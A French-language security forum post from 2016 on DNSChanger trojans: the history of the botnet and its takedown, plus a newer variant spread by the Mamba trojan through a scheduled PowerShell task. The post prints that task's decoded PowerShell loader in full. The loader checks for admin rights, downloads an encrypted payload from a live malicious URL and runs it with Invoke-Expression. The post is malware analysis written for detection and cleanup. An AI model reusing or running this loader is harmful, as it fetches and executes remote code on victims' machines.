Trojan DNSChanger

L'actualité & News Informatique!
Donc pas de demande d'aide dans cette partie.
Malekal_morte
Site Admin
Site Admin
Messages : 95426
Inscription : 10 sept. 2005 13:57
Contact :

Trojan DNSChanger

Message par Malekal_morte » 11 févr. 2016 09:27

Le nom DNSChanger désigne généralement des trojans qui modifient la configuration DNS (serveurs de noms) pour effectuer des attaques MITM (homme du milieu).

Pour toute l'historique des Trojan.DNSChanger, vous pouvez aussi lire la page suivante : Trojan.DNSChanger.

Le tout premier Trojan DNS nommé DNSChanger était un malware lié aux attaques rogues/scareware (Trojan.FakeAv et plus antérieure Trojan.Zlob), il a sévit de 2006 à 2011. Quelques liens :
Trojan DNSChanger et Trojan DNSChanger.

Ce malware est monté à plus de 4 millions de bots, utilisant des serveurs aux USA et dont l'origine est l'Estonie. En 2011, une opération de démantèlement a eu lieu :
Esthost Taken Down – Biggest Cybercriminal Takedown in History (Trend-Micro)
Cybercrime Kingpin Pleads Guilty (krebonsecurity).

La monétisation du botnet se faisait à travers du "clic fraud" c'est à dire la génération de clics sur des publicités et auraient atteint les 14 millions de dollars.

La structure du Trojan DNSChanger :
nelicash_TrojanDNSChanger_Trend-Micro.jpg
Trojan.DNSChanger - ClicFraud
Depuis, certains Adware dont CloudScout utilise ce procédé de modification DNS et notamment le fameux DNS Unlocker(qui semble changer de noms depuis vers des noms en *Lix >> AnyFlix / TopFlix etc)



Un autre malware type "DNSChanger" est aussi très en vogue ces dernières semaines, je le vois pas mal sur des rapports pjjoint (FRST).
Ce DNSChanger serait installé par un Trojan qui se nomme Mamba, un Trojan écrit en python.

Malwarebytes et Cisco ont publié des actualités dessus.
Malwarebytes Trojan.DNSChanger
DNSChanger Outbreak Linked to Adware Install Base

Ce dernier s'appuie sur une tâche planifiée qui lance PowerShell, vous avez un exemple sur ce rapport pjjoint : http://pjjoint.malekal.com/files.php?re ... x13t7y1012
DNSChanger_task_powershell.png
DNSChanger PowerShell
Décodé on obtient :

Code : Tout sélectionner

$ErrorActionPreference="stop";$sc="SilentlyContinue";$WarningPreference=$sc;$ProgressPreference=$sc;$VerbosePreference=$sc;$DebugPreference=$sc;
function sr($p){$n="WindowPosition";try{New-Item -Path $p|Out-Null;}catch{}try{New-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664|Out-Null;}
catch{try{Set-ItemProperty -Path $p -Name $n -Value 201329664|Out-Null;}catch{}}}sr("HKCU:\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe");sr("HKCU:\Console\%SystemRoot%_System32_svchost.exe");sr("HKCU:\Console\taskeng.exe");
$surl="http://fasilmy.info/u/?q=1WLt_qZkpelxemrtZvcUXqyUXFuJUWUndPk85JmwYo3WQMR0XdiH_4TRAO97XYHgwjqT8zHAz9UVmbPil6bhCwTLqZ9wsH64N-E10_rPNG8CYeMi0HWMvLi9ulQ-y3dtZHTXoq7yzRKaa25oUbeuJa9ViFWb8jcya5OIQgrQErwfCYs4_Z7ulLPgvHydQrNonjGscQM26VSfLWcjpI3QK56W2THxGmjdLjU-PE878tNIZ-H0D-w1Jf2iHInjpCaOfIgFIZVhAlplZfoHOpOYg36QKb-KyRS_TuF09yir-3p2WeoUOdyNl1KvUE9SU19zsAhE_Mb6rKSGXpyPGUyyODOr-PO56dlLvZKOUTIGRQfnkBa1luRdrN9fEKy3D06zQaio2bfq0YC2CFGpJ-1re12wQ5Ums0IXfgdEg6Gl082PvhW4advUh34XwhlXkM6k0sl58OjK6DNIMc0&c=Us3DEoFo5gpr0Yr7qy1XpsNyO90HLzg5CncwF1A5qTwqAwt6LrmbOW_3KwQ1x7jdwDIhLS3N8Mh-J2CpCzVIGSVg_EWYjaKExDh_uJbGwM4qSAMyG7pssR_ief3zvv6fGmxYydUTPVMvYwn3x25vO1MWrHufGzV15kXVys4PzGaJY3IkFWE2IFKQOP3eApFdQq_kbD8kJGSI0ardocvOKS2Li8dFwwbVZWQ5xGHXFkedYmqFUUTNjEyJhhwfzcP0xvZaIQuGj2PPh5hlAgUiFxCgkhWSxpkDQW91EO4qacAPnLmx_6iYbgC0BTmxp96HgcUgpNc9NGWAPVATzfdMUNxdvwHq8zp-1tvSc2S7ttcXlSgZ6KqwRtjy1wJkKpBqH9C-i6OFB8vqGU02u2GV7rpWYGUKd5-jHIdn8lCtMbkb7Wm-2jE6KHGK24X79NtGz15l7RxbH3um6pzctNvEu9JqHj0dBl4RCKHOY2PMGJ8X4BipH_4rjMSpFSAu6AA9ZW2peVUOnPlcxzztn5gowrmKsdE6KSgVdaPsOiIG46O0crj4M6_EbsQqS39kPguVvfTrc1JppmOhkkO1getgp0jBdr2_lbK1y68LJksYK2h-v2ZX9_P28lnMEKPea9ZUcSqzFH3paRdBvOMfVldOds2gE9oKsopfX2k&r=8176974896963333939";$stsk="{29868362-9105-EA9B-C368-4FB6EFFBF867}";$prid="DT";$inid="0";try{if($PSVersionTable.PSVersion.Major -lt 2){break;}$v=[System.Environment]::OSVersion.Version;
if($v.Major -eq 5){if(($v.Minor -lt 2) -AND ((Get-WmiObject Win32_OperatingSystem).ServicePackMajorVersion -lt 2)){break;}}
if(-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){break;}
function wc($url){$rq=New-Object System.Net.WebClient;$rq.UseDefaultCredentials=$true;$rq.Headers.Add("user-agent","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)");return [System.Text.Encoding]::ASCII.GetString($rq.DownloadData($url));}
function dstr($rawdata){$bt=[Convert]::FromBase64String($rawdata);$ext=$bt[0];$key=$bt[1] -bxor 170;for($i=2;$i -lt $bt.Length;$i++){$bt[$i]=($bt[$i] -bxor (($key + $i) -band 255));}
return(New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream((New-Object IO.MemoryStream($bt,2,($bt.Length-$ext))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();}
$sc=dstr(wc($surl));Invoke-Expression -command "$sc";}catch{};exit 0;
Les URLs en /u/ sont typiques de ce malware.

(A ce sujet, concernant les malwares utilisant PowerShell, je vous renvoie sur le sujet : Malware FileLess : Kovter, PoweLiks, Gootkit, etc)


La campagne de Trojan DNSChanger atteint les 100 hosts par millions :
dns-changer-infections-host-per-million.png
DNSChanger campagne
Pour vérifier si un Windows est infecté, simplement lancer une analyse FRST (le tutoriel FRST) et vérifier le contenu du fichier Addition.txt si la tâche planifiée est présente.

Pour toute l'historique des Trojan.DNSChanger, vous pouvez aussi lire la page suivante : Trojan.DNSChanger.


Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Répondre

Revenir vers « Actualité & News Informatique »